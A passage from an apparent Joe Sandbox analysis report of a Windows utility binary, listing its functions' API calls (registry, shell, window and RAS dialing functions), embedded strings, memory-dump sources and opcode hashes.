                                                        • Part of subcall function 0040E8BC: RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?,0040EA34,?,?,?,0002001F), ref: 0040E8CE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi$AddressCurrentErrorHandleLastMessageModuleOpenProcProcessmemcpymemsetsprintfstrcmpstrlen
                                                      • String ID: Error$Error %d: %s$The specified key is not valid !
                                                      • API String ID: 3865408157-1131720034
                                                      • Opcode ID: 42a784d353856db3e6df1b1f870fb6a2fae71a5d94022a203ba2e0d0bec324f2
                                                      • Instruction ID: 221a0bed227f0a0d1291a42762b6dca073c9be0b74f9eacabf5e1f3fe4b994a9
                                                      • Opcode Fuzzy Hash: 42a784d353856db3e6df1b1f870fb6a2fae71a5d94022a203ba2e0d0bec324f2
                                                      • Instruction Fuzzy Hash: C6216AB29002589BDB209F61DC459DA37A9FB48744F24057BFD14E22A3E739D981CF98
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_strcmpiatoisprintf
                                                      • String ID: Error$Error %d: %s$force$reboot
                                                      • API String ID: 479048450-3867161120
                                                      • Opcode ID: c9387518b18918b56ce17fe4955c0d0f4d200beb2a723a9ea293e38b76875782
                                                      • Instruction ID: 505fe02bc723ab127a7aee38737edb61bd6ed931556cf03faf7b566618cf9676
                                                      • Opcode Fuzzy Hash: c9387518b18918b56ce17fe4955c0d0f4d200beb2a723a9ea293e38b76875782
                                                      • Instruction Fuzzy Hash: D911DDB29002049BEB209F21CC45BEA7398AF44359F14057BFD14F6292D7BCD585CF58
                                                      APIs
                                                        • Part of subcall function 0040EBBE: EnumWindows.USER32(Function_0000EB42,?), ref: 0040EBCE
                                                      • WinExec.KERNEL32(regedit.exe,00000005), ref: 0040EE2C
                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0040EE3F
                                                      • ShowWindow.USER32(?,00000009,?,?,0040A031,?,?), ref: 0040EE50
                                                      • SetForegroundWindow.USER32(?), ref: 0040EE58
                                                      • Sleep.KERNEL32(00000064,?,?,0040A031,?,?), ref: 0040EE6A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$EnumExecForegroundLongShowSleepWindows
                                                      • String ID: regedit.exe
                                                      • API String ID: 2288784986-3532722396
                                                      • Opcode ID: a8f636d2e51d0afa5aab2da2c5faa6d7d014c79bce6297dafbd60a2399fc7468
                                                      • Instruction ID: 06b5dbe14a403dfdfde3d240e558f745117ddf8b4c9bbaf8e868fce31c675668
                                                      • Opcode Fuzzy Hash: a8f636d2e51d0afa5aab2da2c5faa6d7d014c79bce6297dafbd60a2399fc7468
                                                      • Instruction Fuzzy Hash: F701A2352043016FE7103F63DC89B9B7B65BF48754F048A36BA15B11F1DB799C708A59
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi$ClassNamememset
                                                      • String ID: SysListView32$SysTreeView32
                                                      • API String ID: 538907304-676203472
                                                      • Opcode ID: 9a17f16003ffebb12cd39ee98549005b67c7db4a5abf7fe2706005f807c12da0
                                                      • Instruction ID: 94bfcd5f7330f9d384e7a99c0efc30348f28293cccce4688d0165577fa633baf
                                                      • Opcode Fuzzy Hash: 9a17f16003ffebb12cd39ee98549005b67c7db4a5abf7fe2706005f807c12da0
                                                      • Instruction Fuzzy Hash: AB01AE739041196AEB10D655DC01BD6B7ACEF58314F104077F549F3145E6B4A6D48794
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(rasdlg.dll), ref: 0040DA44
                                                      • GetProcAddress.KERNEL32(00000000,RasDialDlgA), ref: 0040DA56
                                                      • FreeLibrary.KERNEL32(00000000), ref: 0040DA8B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: $$RasDialDlgA$rasdlg.dll
                                                      • API String ID: 145871493-203725436
                                                      • Opcode ID: f1c492473199b312742630ce50a553060a0b9ea4eaacc9b47ea43307da62c793
                                                      • Instruction ID: 68f391b2774ba09ea96552c72365f85ea97e68f0d825624862b4824abb057f86
                                                      • Opcode Fuzzy Hash: f1c492473199b312742630ce50a553060a0b9ea4eaacc9b47ea43307da62c793
                                                      • Instruction Fuzzy Hash: 8CF04F36E017596BCF115BA68C049DF7AA9EB88711B108032EE05B2250DB39DA458AA8
                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,00000000,00407699), ref: 00403259
                                                      • LoadLibraryA.KERNEL32(user32.dll,00000000,00407699), ref: 00403263
                                                      • GetProcAddress.KERNEL32(00000000,SetLayeredWindowAttributes), ref: 00403275
                                                      • FreeLibrary.KERNEL32(00000000), ref: 0040328E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$Free$AddressLoadProc
                                                      • String ID: SetLayeredWindowAttributes$user32.dll
                                                      • API String ID: 1386263645-3673630139
                                                      • Opcode ID: 6f4f77f8b42d0ab9d9921bb22e7f0633e3b4abeb14136758e52d57a767b6cc63
                                                      • Instruction ID: 508ee469509ce2a81303781f6ead71e3a56e55b5475b293b8efb72fc7f039a29
                                                      • Opcode Fuzzy Hash: 6f4f77f8b42d0ab9d9921bb22e7f0633e3b4abeb14136758e52d57a767b6cc63
                                                      • Instruction Fuzzy Hash: 9CF082317003009BD7609F79ED447577BDCAF44712B24483EA985D2590D678D6808A14
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(shell32.dll,0040F202,?,?,0040A2FE,00000000,?,emptybin,?,moverecyclebin,?,rasdial,?,inetdial,?,rasdialdlg), ref: 0040F123
                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F13F
                                                      • GetProcAddress.KERNEL32(SHEmptyRecycleBinA), ref: 0040F151
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: SHEmptyRecycleBinA$SHGetSpecialFolderPathA$shell32.dll
                                                      • API String ID: 2238633743-3413488100
                                                      • Opcode ID: 581fa2eb7aa84e403ad803d9283d580bd6f55d19ef43f57d3b0a13ffac35e7a6
                                                      • Instruction ID: 358816b09f5cf14f0a8c17e475983ab2099924a059b021d90ca1dee1fadbbd52
                                                      • Opcode Fuzzy Hash: 581fa2eb7aa84e403ad803d9283d580bd6f55d19ef43f57d3b0a13ffac35e7a6
                                                      • Instruction Fuzzy Hash: B4E0BF74942218EAC7105BF5BD087C13EA8B754710702907BF914A27A0D77998988B5C
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: memcmp$wcscpy$memset
                                                      • String ID:
                                                      • API String ID: 2645737430-0
                                                      • Opcode ID: 569751cad2242c83ee233c0caec67b1b752288b4dfec1d5f6af324c0f461c5ff
                                                      • Instruction ID: a185caca4accc185db94d1b15df19a4a4f3c44e45ead4d0fb7599e0fa15f7159
                                                      • Opcode Fuzzy Hash: 569751cad2242c83ee233c0caec67b1b752288b4dfec1d5f6af324c0f461c5ff
                                                      • Instruction Fuzzy Hash: 17413FB2D00218ABDF10DB55C985EDEB7B8FF54314F0084BAE804A7295E774AB84CB95
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000,?,0040670F,?,?,?,?,?,?,?,bin), ref: 0040DE6E
                                                      • memset.MSVCRT ref: 0040DECA
                                                      • memset.MSVCRT ref: 0040DEDC
                                                        • Part of subcall function 0040DC6C: strchr.MSVCRT ref: 0040DC85
                                                        • Part of subcall function 0040DC6C: _mbscpy.MSVCRT ref: 0040DD1D
                                                      • memset.MSVCRT ref: 0040DFBD
                                                      • _mbscpy.MSVCRT ref: 0040DFE2
                                                      • CloseHandle.KERNEL32(?,?,?,00000000,?,0040670F,?,?,?,?,?,?,?,bin,noascii,nohex), ref: 0040E02C
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcessstrchr
                                                      • String ID:
                                                      • API String ID: 1762955152-0
                                                      • Opcode ID: c9f5b38cd2bb14387c05b6e9d33b2ea8e4c943c113d1febc5a93918fbb27d101
                                                      • Instruction ID: 3ec9d15c4d0ff2b0f3739c024993d8b579f8cdb1e0a900159d56b00f8823cef8
                                                      • Opcode Fuzzy Hash: c9f5b38cd2bb14387c05b6e9d33b2ea8e4c943c113d1febc5a93918fbb27d101
                                                      • Instruction Fuzzy Hash: DF513A719012189BEB21DFA1DD84BDE7BBCFF04340F1041AAF919A2291D7B4DA85CF68
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: memset$Initialize_strcmpi
                                                      • String ID: Failed to create the shortcut !$common_desktop
                                                      • API String ID: 1727636871-3522837031
                                                      • Opcode ID: c89bc6213b0406c9ef4e3ccfbb2741ee903cf2afa37e4de917d9679df9280615
                                                      • Instruction ID: 8b057e69c421a6aad5f95a2eacbe0e8fc5b10904757b5b646500936ad7ac3ce9
                                                      • Opcode Fuzzy Hash: c89bc6213b0406c9ef4e3ccfbb2741ee903cf2afa37e4de917d9679df9280615
                                                      • Instruction Fuzzy Hash: 6B312BB390411C6BDB109B64DC85BDA77BC9B54354F1400BAF948F71C1D6B8FAC48B99
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: memset$Initialize_strcmpi
                                                      • String ID: Failed to create the shortcut !$common_desktop
                                                      • API String ID: 1727636871-3522837031
                                                      • Opcode ID: 0afc20c4c0532fcc45f75c03fc930cccd236ddd9c737a5e819b46d6c2e0a8990
                                                      • Instruction ID: c5e697d6162886b22df4d0986660878d90a557d6ced7ef9782dedf35c4f0d7c4
                                                      • Opcode Fuzzy Hash: 0afc20c4c0532fcc45f75c03fc930cccd236ddd9c737a5e819b46d6c2e0a8990
                                                      • Instruction Fuzzy Hash: 0C2139739081186BE7209B55DC89FDB776C9F14314F0040BBF958F71C2DAB8AAC58BA9
                                                      APIs
                                                      • GlobalFix.KERNEL32(?), ref: 00401571
                                                      • GlobalUnWire.KERNEL32(?), ref: 00401592
                                                      • GlobalSize.KERNEL32(?), ref: 0040157C
                                                        • Part of subcall function 00402DFB: WriteFile.KERNEL32(?,?,0040161C,00000000,00000000,?,?,0040161C,?,?), ref: 00402E12
                                                      • memset.MSVCRT ref: 004015B8
                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004015D5
                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040161F
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Global$??2@??3@FileSizeWireWritememset
                                                      • String ID:
                                                      • API String ID: 217115826-0
                                                      • Opcode ID: a3e94c4bb87033b8434b877ebf70879d1b61f74d8f630fc622babe24f9e38f80
                                                      • Instruction ID: 9419d66bcd9dba4478d6399af0118c680bf903b0141ed144c7d6fbca291d275f
                                                      • Opcode Fuzzy Hash: a3e94c4bb87033b8434b877ebf70879d1b61f74d8f630fc622babe24f9e38f80
                                                      • Instruction Fuzzy Hash: 81215CB1900208FFDF119FE4CD45CAEBBB9FF08304B10882AF546A7261D776AA509B54
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00402539
                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040254A
                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00402551
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00402559
                                                      • GetWindowRect.USER32(?,?), ref: 00402566
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004025A4
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CapsDeviceWindow$MoveRectRelease
                                                      • String ID:
                                                      • API String ID: 3197862061-0
                                                      • Opcode ID: a1a3e5a7d4c5611e2dfcf82dc9d1b913f0b11f2bd4278a02d19f5b6f997ecd09
                                                      • Instruction ID: d9f08ddc90771b881b67158836cc7b9c2442dbeff3b14118eade0b8f3e1096af
                                                      • Opcode Fuzzy Hash: a1a3e5a7d4c5611e2dfcf82dc9d1b913f0b11f2bd4278a02d19f5b6f997ecd09
                                                      • Instruction Fuzzy Hash: 3A115E31A0011AAFDB109FB9CD4DEEF7FB9EB84751F014165FA05E7260D670AD01CAA0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strchr$_mbscpy_strcmpimemset
                                                      • String ID:
                                                      • API String ID: 576810046-0
                                                      • Opcode ID: 8f02f78ed4599b55b5ca2775329a651cdaede78c3b66270004c571e04045ca73
                                                      • Instruction ID: 7a8f1cfe073f3a0e4f0d207cba5cda54e240bfa0d40924a8a1f0b8c4c336a51f
                                                      • Opcode Fuzzy Hash: 8f02f78ed4599b55b5ca2775329a651cdaede78c3b66270004c571e04045ca73
                                                      • Instruction Fuzzy Hash: D101D27114820869FB20A662CD16FDB369C9F14304F5004ABF589F90C3EEFCE9C086A9
                                                      APIs
                                                        • Part of subcall function 0040F115: LoadLibraryA.KERNEL32(shell32.dll,0040F202,?,?,0040A2FE,00000000,?,emptybin,?,moverecyclebin,?,rasdial,?,inetdial,?,rasdialdlg), ref: 0040F123
                                                        • Part of subcall function 0040F115: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F13F
                                                        • Part of subcall function 0040F115: GetProcAddress.KERNEL32(SHEmptyRecycleBinA), ref: 0040F151
                                                      • memset.MSVCRT ref: 0040F271
                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,0040547C,?,?,?), ref: 0040F2B2
                                                      • RegCloseKey.ADVAPI32(0040547C,?,?,?,?,?,?), ref: 0040F2E4
                                                      • _mbscpy.MSVCRT ref: 0040F2F2
                                                        • Part of subcall function 004023FF: GetVersionExA.KERNEL32(004162F0,00000104,00402439,004047E0,?,?,?,?,00000000,?), ref: 00402419
                                                      Strings
                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040F292, 0040F2A8
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$CloseLibraryLoadOpenVersion_mbscpymemset
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                      • API String ID: 3616037016-2036018995
                                                      • Opcode ID: 17b1f62fe2048fce06dbb01fa1f0a8f2fad16fa5e3d01031b7466c682c8fa380
                                                      • Instruction ID: 11552b202ba6acbcb19286cf562ec08a03818177671fb195257c312d08f528e2
                                                      • Opcode Fuzzy Hash: 17b1f62fe2048fce06dbb01fa1f0a8f2fad16fa5e3d01031b7466c682c8fa380
                                                      • Instruction Fuzzy Hash: 5621DB76800218BEEB30A6949C89DEF77AC9B09304F5100FBFD11B25D2D67A9ECC965D
                                                      APIs
                                                      • memset.MSVCRT ref: 0040EB62
                                                      • GetClassNameA.USER32(?,00000000,000000FF), ref: 0040EB76
                                                      • _strcmpi.MSVCRT ref: 0040EB88
                                                      • EnumChildWindows.USER32(?,Function_0000EAC7,?), ref: 0040EBA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ChildClassEnumNameWindows_strcmpimemset
                                                      • String ID: RegEdit_RegEdit
                                                      • API String ID: 3222542750-157708615
                                                      • Opcode ID: a286787a4daa6ec75f723a690ee0b5da6a0a4cc0b10a4dd347cda027d92e6d4e
                                                      • Instruction ID: 7718ebed06378b6a9df5c6e1c075143ecd23c8014415ffea57366fd316ada116
                                                      • Opcode Fuzzy Hash: a286787a4daa6ec75f723a690ee0b5da6a0a4cc0b10a4dd347cda027d92e6d4e
                                                      • Instruction Fuzzy Hash: 7FF0493250011A6AD721E7269C01FEB73ACAF59304F1000B3F901F21C1E6B8AA404BA8
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastMessagesprintf
                                                      • String ID: Error$Error %d: %s
                                                      • API String ID: 1670431679-1552265934
                                                      • Opcode ID: e40f87e164fceb169b81995f9388c9f0be76e8a3efcbe465a6244cd02b9007d3
                                                      • Instruction ID: 8f99f09f2c946179dff47e3d5b446a277154dc52d41e427cf839fd2f267041ab
                                                      • Opcode Fuzzy Hash: e40f87e164fceb169b81995f9388c9f0be76e8a3efcbe465a6244cd02b9007d3
                                                      • Instruction Fuzzy Hash: B6F090B650020866D720A764DC05BDBB2FCBB44744F14417AAB45F2190EBB89A898FAD
                                                      APIs
                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0040507D
                                                      • GetProcAddress.KERNEL32(00000000,DllUnregisterServer), ref: 0040509C
                                                      • FreeLibrary.KERNEL32(00000000), ref: 004050AE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: DllRegisterServer$DllUnregisterServer
                                                      • API String ID: 145871493-2931954178
                                                      • Opcode ID: 8d155a9baae625b6f410fcf510d096983f249a7cf484d85348d48b45f3859d2c
                                                      • Instruction ID: 293957d507e2e6af4d633f8260c06d9890627f7da330c299c3811550d654a46b
                                                      • Opcode Fuzzy Hash: 8d155a9baae625b6f410fcf510d096983f249a7cf484d85348d48b45f3859d2c
                                                      • Instruction Fuzzy Hash: 4DE02B31649670A7C1321B25AC489EF7E50DBC5F71B204733F216F11E0CB7848858ADB
                                                      APIs
